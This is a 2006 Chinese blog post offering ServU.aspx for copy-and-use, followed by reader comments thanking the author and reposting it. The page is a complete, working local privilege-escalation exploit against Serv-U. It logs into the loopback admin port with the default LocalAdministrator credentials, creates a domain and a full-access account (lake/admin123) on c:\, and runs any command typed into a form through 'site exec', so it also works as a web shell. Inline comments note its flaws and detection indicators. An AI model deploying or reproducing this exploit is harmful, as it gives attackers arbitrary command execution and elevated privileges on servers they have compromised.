

原创 ServU.aspx收藏


ServU的本地提权问题已经很老了,没啥说的,只是相继出现了PHP、Perl版本,当然不能少了aspx版本^_^

以下代码Copy,保存为一个aspx文件即可。

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<%-- Debug="true" makes ASP.NET return detailed compiler/runtime error pages to the
     browser, and the handlers below also write raw exception text into the response
     (response.write(eee.ToString())); both disclose server-side details to whoever
     reaches this page. Nothing on the page authenticates the caller. --%>
<script runat="server">

    '
    ' Love, Where are you ?
   
    ' Click handler for BTN_Start. Opens two TCP connections to 127.0.0.1 and drives
    ' the Serv-U administration dialogue over them, echoing every line sent and
    ' received into the HTTP response through Rec/Send (defined further down).
    ' Inputs: Text_Name, Text_PWD, Text_Port, Text_cmd form fields.
    ' No reply code is ever inspected: each step runs whether or not the previous
    ' one was accepted, so success has to be judged from the echoed output.
    ' There is no Finally/Using; an exception in the middle leaves both sockets
    ' open until garbage collection.
    Sub BTN_Start_Click(sender As Object, e As EventArgs)
        Dim Usr As String = Text_Name.Text
        Dim pwd As String = Text_PWD.Text
        ' Implicit String -> Int32 conversion (Option Strict is not enabled on this
        ' page); non-numeric input fails with a conversion exception before any
        ' socket is opened.
        Dim Port As Int32 = Text_Port.Text
        Dim Command As String = Text_cmd.Text
   
        ' Protocol lines for the administrative session. Everything except Usr/pwd
        ' is fixed: a temporary domain named "cctv" on 0.0.0.0:43859 and an account
        ' lake/admin123 with HomeDir c:\ and the full "RWAMELCDP" access string.
        ' Because these values never change, their appearance in Serv-U's
        ' configuration or in loopback traffic is a usable indicator that this
        ' tool was run.
        Dim LoginUser As String = "User " & Usr & vbcrlf
        Dim LoginPass As String = "Pass " & pwd & vbcrlf
        Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
        Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
        Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
                    "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
                    "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
                    "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
                    "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
                    "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
                    "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
        Dim Quit As String = "QUIT" & vbcrlf
        Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
   
        'Dim client As New TcpClient
        ' First connection: the admin port entered in the form, loopback only.
        ' On failure the unfiltered exception text is written to the page and the
        ' response is ended (response.end aborts the request thread).
        Dim tcpClient As New TcpClient()
        Try
            tcpClient.Connect("127.0.0.1", port)
        Catch eee As Exception
            response.write(eee.ToString())
            response.end
        End Try
        tcpClient.ReceiveBufferSize = 1024
        Dim networkStream As NetworkStream = tcpClient.GetStream()
        ' Read the banner, then alternate one Send with one Rec per protocol line.
        ' DelDomain is sent before NewDomain so a leftover domain on 43859 from an
        ' earlier run does not block the new one (inferred from the ordering).
        Rec(networkStream)
        Send(networkStream, LoginUser)
        Rec(networkStream)
        Send(networkStream, LoginPass)
        Rec(networkStream)
        Send(networkStream, MAINTENANCE)
        Rec(networkStream)
        Send(networkStream, DelDomain)
        Rec(networkStream)
        Send(networkStream, NewDomain)
        Rec(networkStream)
        Send(networkStream, NewUser)
        Rec(networkStream)
               ' Second connection: the domain just created on 43859, authenticated
               ' with the fixed lake/admin123 account from NewUser. Command is taken
               ' from the form and spliced into the "site exec" line verbatim,
               ' without any validation.
               Dim tcpClient2 As New TcpClient()
               Try
                   tcpClient2.Connect("127.0.0.1", 43859)
               Catch eee As Exception
                   response.write(eee.ToString())
                   response.end
               End Try
               tcpClient2.ReceiveBufferSize = 1024
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
               Rec(networkStream2)
               Send(networkStream2, "User lake" & vbcrlf)
               Rec(networkStream2)
               Send(networkStream2, "pass admin123" & vbcrlf)
               Rec(networkStream2)
               Send(networkStream2, "site exec " & Command & vbcrlf)
               Rec(networkStream2)
               tcpClient2.Close()
        ' Cleanup on the admin session: remove the temporary domain again and log
        ' out. This only runs if none of the calls above threw; on an exception
        ' the "cctv" domain and the lake account are left behind.
        Send(networkStream, DelDomain)
        Rec(networkStream)
        Send(networkStream, Quit)
        Rec(networkStream)
        tcpClient.Close()
    End Sub
   
   
   
    ' Reads one chunk from a stream-like object and echoes it to the page as
    ' "out:<data><br>". o is declared As Object, so CanRead/Read are late-bound;
    ' every caller above passes a NetworkStream.
    ' Dim bytes(1024) allocates 1025 elements in VB, one more than the 1024
    ' requested from Read. The count Read returns is discarded and the whole
    ' buffer is decoded, so the echoed string carries the unused trailing NUL
    ' bytes. A single Read can also return only part of a server reply; nothing
    ' here loops or parses reply codes.
    Sub Rec(o As Object)
       If o.CanRead Then
          Dim bytes(1024) As Byte
          o.Read(bytes, 0, 1024)
          Dim returndata As String = Encoding.ASCII.GetString(bytes)
          response.Write("out:" & returndata & "<br>")
       Else
          response.Write("What's wrong ?")
       End If
    End Sub
   
    ' ASCII-encodes data, writes it to the stream-like object o (late-bound, a
    ' NetworkStream in every caller above) and echoes the same text to the page
    ' as "in: <data><br>". Note that this echo includes the credentials passed
    ' in LoginUser/LoginPass, so they end up in the HTTP response body.
    ' Write failures are not caught here; only the CanWrite flag is checked.
    Sub Send(o As Object,data As String)
       If o.CanWrite Then
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
          o.Write(sendBytes, 0, sendBytes.Length)
          response.write("in: " & data & "<br>")
       Else
          response.Write("What's wrong ?")
       End If
    End Sub

</script>
<html>
<head>
</head>
<body>
    <form runat="server">
        <%-- Defaults baked into the form: Text_Name "LocalAdministrator", a fixed
             password in Text_PWD, and admin port 43958 in Text_Port (the loopback
             port BTN_Start_Click connects to first). Text_cmd is passed to the
             handler unvalidated. No control on this page restricts who may
             submit it; the fixed strings double as indicators when hunting for
             copies of this page on a server. --%>
        <p>
            <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
            admin by lake2</asp:Label>
        </p>
        <p>
            <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
            <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
            <br />
            <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
            <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
            <br />
            <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
            <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
            <br />
            <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
            <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
        </p>
        <p>
            <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
        </p>
        <p>
            <hr />
            <!-- Insert content here -->
        </p>
    </form>
</body>
</html>

发表于 @ 2006年03月16日 15:30:00|评论(loading...)|编辑


评论

#Bluer 发表于2006-03-17 22:03:00  IP: 58.48.203.*
More to http://bluer.ful.cn/
#neeao 发表于2006-03-22 08:39:00  IP: 222.40.15.*
好东西啊!支持一下!
#lake2 发表于2006-03-22 13:02:00  IP: 125.71.5.*
thanks
#小七 发表于2006-03-22 23:11:00  IP: 221.14.234.*
支持下哈。
#NetKnave 发表于2006-03-25 03:40:00  IP: 58.49.248.*
我爱死你了....真地!!!!
#lake2 发表于2006-03-25 08:08:00  IP: 125.71.4.*
你丫的又不是女人,没资格爱偶 :)
#sykkk 发表于2006-03-29 23:06:00  IP: 59.107.107.*
你Y的还是丢出来了啊 哈哈 都写了一个多月了也该放出来大家用下了 哈哈
#全金属外壳 发表于2006-03-30 17:17:00  IP: 219.159.95.*
哈哈哈..lake2兄就是好啊就是好..这下..可好哩.不知我的QQ留言您看到了没?
#我不是黑客 发表于2006-04-01 18:21:00  IP: 218.28.194.*
转走了,打个招呼
#lake2 发表于2006-04-02 08:25:00  IP: 125.71.1.*
ASP能够实现?怀疑ing,呵呵,拿出来看
#寂寞 发表于2006-04-02 06:31:00  IP: 220.163.83.*
靠!要不要asp版的,我手里自己弄了个!
#全金属外壳  发表于2006-04-05 12:04:00  IP: 219.159.93.*
ASP...有个组件叫MSWinsock.winsock的不知道行不行
#NetSnow 发表于2006-04-08 09:16:00  IP: 219.148.133.*
哦转走了。。。打个招呼先!
#.. 发表于2006-04-09 17:27:00  IP: 222.18.178.*
今天用不来,明天就会了。
转走了。嘻嘻。。
谢谢。。。。。。
#金州 发表于2006-05-10 16:00:00  IP: 222.40.232.*
大哥,此文已转走学习
http://www.eviloctal.com/forum/htm_data/23/0605/22051.html
#飘落枫叶 发表于2006-06-18 12:34:00  IP: 60.216.223.*
哈.收下看看代码哈.
#呆菜 发表于2006-08-17 16:39:00  IP: 219.149.71.*
嘿嘿 谢谢啊
#兵临城下 发表于2006-08-22 21:08:00  IP: 218.106.82.*
我用的你们的servu.asp---hackins后就不行了不知是什么原因,请赐教,QQ:490236109
#lake2 发表于2006-08-22 21:41:00  IP: 220.166.82.*
没有那个义务
#冰天丽雪 发表于2006-08-23 11:52:00  IP: 222.82.59.*
嘿嘿~~lake2~
东西不错,人也不错,真不错!~